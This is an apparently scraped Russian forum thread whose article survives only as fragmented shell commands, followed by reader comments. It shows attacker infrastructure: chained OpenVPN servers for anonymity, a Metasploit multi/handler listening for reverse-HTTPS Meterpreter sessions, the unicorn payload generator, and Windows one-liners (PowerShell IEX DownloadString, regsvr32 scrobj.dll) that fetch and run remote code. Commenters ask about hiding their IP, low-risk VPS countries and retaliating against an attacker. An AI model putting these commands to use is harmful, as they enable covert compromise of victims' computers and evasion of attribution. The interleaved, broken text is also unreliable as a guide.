Отличная статья!
Надеюсь, что будут выходить ещё части.
Автору плюс.
Надеюсь, что будут выходить ещё части.
Автору плюс.
Следуйте инструкциям в видео ниже, чтобы узнать, как установить наш сайт как веб-приложение на главный экран вашего устройства.
Примечание: Эта функция может быть недоступна в некоторых браузерах.
sudo vi /etc/ssh/sshd_config
sudo vi /etc/openvpn/server.conf
sudo ufw allow 2375
sudo ufw allow 2376
sudo vi /etc/openvpn/server.conf
sudo vi /etc/ssh/sshd_config
После рестарта openvpn@server связь оборвется. Закрываем окно и переходим к след. пункту.sudo systemctl restart ssh
sudo systemctl restart openvpn@server
sudo vi /etc/openvpn/client.conf
Связь с SRV2 снова восстановлена!sudo systemctl restart openvpn@client
Комментируем следующую директивуssh vpnsrv1
sudo vi /etc/openvpn/server.conf
verb 3 меняем на verb 0;status openvpn-status.log
verb 0
sudo vi /etc/openvpn/client.conf
verb 0
sudo systemctl restart openvpn@client
sudo systemctl restart openvpn@server
remote IP_address_of_SRV1 4911
;duplicate-cn
sudo echo 'deb http://downloads.metasploit.com/data/releases/metasploit-framework/apt jessie main' | sudo tee /etc/apt/sources.list.d/metasploit-framework.list
sudo wget -qO - http://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -
sudo apt update && sudo apt dist-upgrade
sudo apt install metasploit-framework postgresql -y
sudo systemctl start postgresql
msfdb init
sudo ln -s /home/admin/.msf4/ /root/
sudo apt install screen
screen -S msf sudo msfconsole
sudo ufw allow 443
sudo ufw allow 8443
screen -S msf sudo msfconsole
use multi/handler
set payload windows/meterpreter/reverse_https
set LPORT 443
curl ident.me; echo
set LHOST IP_address_of_SRV2
set ExitOnSession false
set EnableStageEncoding true
exploit -j
git clone https://github.com/trustedsec/unicorn.git
IEX(New-Object Net.WebClient).DownloadString('
regsvr32 -s -n -u -i:https://raw.githubusercontent.com/XXXXXX/XXX/master/stage2 scrobj.dll
regsvr32 -s -n -u -i:http://bit.ly/XXXXX scrobj.dll
ssh vpnsrv2
screen -r msf
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
Чай, сухари)))))Вот читаю я это всё, смотрю и мне как-то стрёмно, этим заниматься, ведь что-то могу протупить и привет чай, сухари и чё там ещё))) Я так понимаю, у ТС есть нормальный опыт в этом. У меня пару вопросов:
1. Ок, идёт у нас связка VPN -> TOR -> VPN. Как узнать, что все цепи работают нормально и одна не отвалилась и не спалила наш IP?
2. В каких странах лучше покупать ВПС с меньшим риском?
3. Разве не нужно ещё ставить шифрование диска ВПС для надежности? Если стоит - то что ставить и как?
iptables усвоил не давно. Но UFW мне кажется удобнее для мелких задач, типа открыть/закрыть порт.ты мне нравишься.
Почему ufw а не iptables ?
Личное предпочтение или не владеешь?
ну просто странно использовать vi и не пользоваться iptables))удобнее
И в правду, перейдука я тогда на iptables))))) vi - мощный инструмент.ну просто странно использовать vi и не пользоваться iptables))
Ну, я на амазоне вряд ли покупать буду, для такого, любой впс можно взять. Но я щас смотрю в сторону хуникса, для тестов. Тоже ведь хороший вариант, с такой цепочкой? Обнаружил сегодня ip, который брутит мою админку вп, сижу и думаю, что бы сделать)))3. Думаю стоит шифровать, делается это штатными средствами amazon aws, надо не много повозиться. Но я не доконца понял принцип его работы.
Бан по ip или сделай скрипт который при 10 неправильных попытках входа добавляет ip в банНу, я на амазоне вряд ли покупать буду, для такого, любой впс можно взять. Но я щас смотрю в сторону хуникса, для тестов. Тоже ведь хороший вариант, с такой цепочкой? Обнаружил сегодня ip, который брутит мою админку вп, сижу и думаю, что бы сделать)))
Да но амазон бесплатный)) зачем каждый месяц платить два сервера? Тем более за приемлемую цену врядь ли найдешь что то лучше амазон? Ты видел какая там скорось? ~ 600 Mbit/s download/uploadНу, я на амазоне вряд ли покупать буду, для такого, любой впс можно взять. Но я щас смотрю в сторону хуникса, для тестов. Тоже ведь хороший вариант, с такой цепочкой? Обнаружил сегодня ip, который брутит мою админку вп, сижу и думаю, что бы сделать)))
Так у меня защита там стоит, хрен попадут) я просто думаю, чтобы в отместку сделать, чтобы знали) На днях напишу статью, про защиту сайтов на ВП от скана и брута)Бан по ip или сделай скрипт который при 10 неправильных попытках входа добавляет ip в бан
Хм, возможно ты прав. Я просто не в курсе, что к чему там)Да но амазон бесплатный)) зачем каждый месяц платить два сервера? Тем более за приемлемую цену врядь ли найдешь что то лучше амазон? Ты видел какая там скорось? ~ 600 Mbit/s download/upload
Уже интересно. Про zip бомбу уже писали если чтопро защиту сайтов на ВП от скана и брута
Нет. Я хочу написать про плагины, которые проверенны лично мной и работают. Настройка и т.п.) Я же в пентесте баран, пока что) а так, поделюсь тем, что знаю. Сравню и выложу примеры скана до и после.Уже интересно. Про zip бомбу уже писали если что
Привет. По моему ты путаешь это с закреплентем в системе через планировшик задач, путем импорта XML.Всем привет. подскажите, а что бы импортировать xml, разве не нужны системные привилегии ?
подкидывай ему редирект на сайт www.nsa.govя просто думаю, чтобы в отместку сделать, чтобы знали)
Да, вы правы.Привет. По моему ты путаешь это с закреплентем в системе через планировшик задач, путем импорта XML.
В данном примере xml это инструкции для regsvr32, которые загружаются в RAM память. Привилегии не требуются.
Комментарии
30